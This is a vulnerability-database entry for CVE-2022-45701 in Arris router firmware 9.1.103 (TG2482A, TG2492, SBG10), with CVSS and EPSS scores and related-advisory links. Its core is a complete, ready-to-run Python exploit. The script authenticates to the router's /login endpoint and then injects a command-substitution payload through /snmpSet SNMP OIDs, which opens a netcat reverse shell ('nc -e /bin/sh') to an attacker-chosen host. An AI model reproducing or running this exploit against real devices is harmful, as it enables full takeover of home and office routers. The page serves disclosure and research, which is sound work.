Lucene search
Yerodin Richards1337DAY-ID-38202HistoryFeb 15, 2023 - 12:00 a.m.
Arris Router Firmware 9.1.103 Remote Code Execution Exploit
2023-02-1500:00:00
Yerodin Richards
0day.today
235
arris router
firmware 9.1.103
remote code execution
authenticated
commscope
cve-2022-45701
tg2482a
tg2492
sbg10
exploit
base64
cookie
payload
network configuration
shell access
8.8 High
CVSS3
Attack Vector
NETWORK
Attack Complexity
LOW
Privileges Required
LOW
User Interaction
NONE
Scope
UNCHANGED
Confidentiality Impact
HIGH
Integrity Impact
HIGH
Availability Impact
HIGH
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
9.2 High
AI Score
Confidence
High
0.027 Low
EPSS
Percentile
90.5%
Arris Router Firmware version 9.1.103 authenticated remote code execution exploit that has been tested against the TG2482A, TG2492, and SBG10 models.
# Exploit Title: Arris Router Firmware 9.1.103 - Remote Code Execution (RCE) (Authenticated)
# Exploit Author: Yerodin Richards
# Vendor Homepage: https://www.commscope.com/
# Version: 9.1.103
# Tested on: TG2482A, TG2492, SBG10
# CVE : CVE-2022-45701
import requests
import base64
router_host = "http://192.168.0.1"
username = "admin"
password = "password"
lhost = "192.168.0.6"
lport = 80
def main():
print("Authorizing...")
cookie = get_cookie(gen_header(username, password))
if cookie == '':
print("Failed to authorize")
exit(-1)
print("Generating Payload...")
payload = gen_payload(lhost, lport)
print("Sending Payload...")
send_payload(payload, cookie)
print("Done, check shell..")
def gen_header(u, p):
return base64.b64encode(f"{u}:{p}".encode("ascii")).decode("ascii")
def no_encode_params(params):
return "&".join("%s=%s" % (k,v) for k,v in params.items())
def get_cookie(header):
url = router_host+"/login"
params = no_encode_params({"arg":header, "_n":1})
resp=requests.get(url, params=params)
return resp.content.decode('UTF-8')
def set_oid(oid, cookie):
url = router_host+"/snmpSet"
params = no_encode_params({"oid":oid, "_n":1})
cookies = {"credential":cookie}
requests.get(url, params=params, cookies=cookies)
def gen_payload(h, p):
return f"$\(nc%20{h}%20{p}%20-e%20/bin/sh)"
def send_payload(payload, cookie):
set_oid("1.3.6.1.4.1.4115.1.20.1.1.7.1.0=16;2;", cookie)
set_oid(f"1.3.6.1.4.1.4115.1.20.1.1.7.2.0={payload};4;", cookie)
set_oid("1.3.6.1.4.1.4115.1.20.1.1.7.3.0=1;66;", cookie)
set_oid("1.3.6.1.4.1.4115.1.20.1.1.7.4.0=64;66;", cookie)
set_oid("1.3.6.1.4.1.4115.1.20.1.1.7.5.0=101;66;", cookie)
set_oid("1.3.6.1.4.1.4115.1.20.1.1.7.9.0=1;2;", cookie)
if __name__ == '__main__':
main()
Related
cve
cve
CVE-2022-45701
2023-02-17 15:15:12
cvelist
cvelist
CVE-2022-45701
2023-02-17 00:00:00
packetstorm
packetstorm
Arris Router Firmware 9.1.103 Remote Code Execution
2023-02-15 00:00:00
prion
prion
Remote code execution
2023-02-17 15:15:00
nvd
nvd
CVE-2022-45701
2023-02-17 15:15:12
malwarebytes
malwarebytes
Arris router vulnerability could lead to complete takeover
2023-02-16 10:00:00
zdt
zdt
exploitdb
exploitdb
Arris Router Firmware 9.1.103 - Remote Code Execution (RCE) (Authenticated)
2023-04-06 00:00:00
8.8 High
CVSS3
Attack Vector
NETWORK
Attack Complexity
LOW
Privileges Required
LOW
User Interaction
NONE
Scope
UNCHANGED
Confidentiality Impact
HIGH
Integrity Impact
HIGH
Availability Impact
HIGH
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
9.2 High
AI Score
Confidence
High
0.027 Low
EPSS
Percentile
90.5%
Related for 1337DAY-ID-38202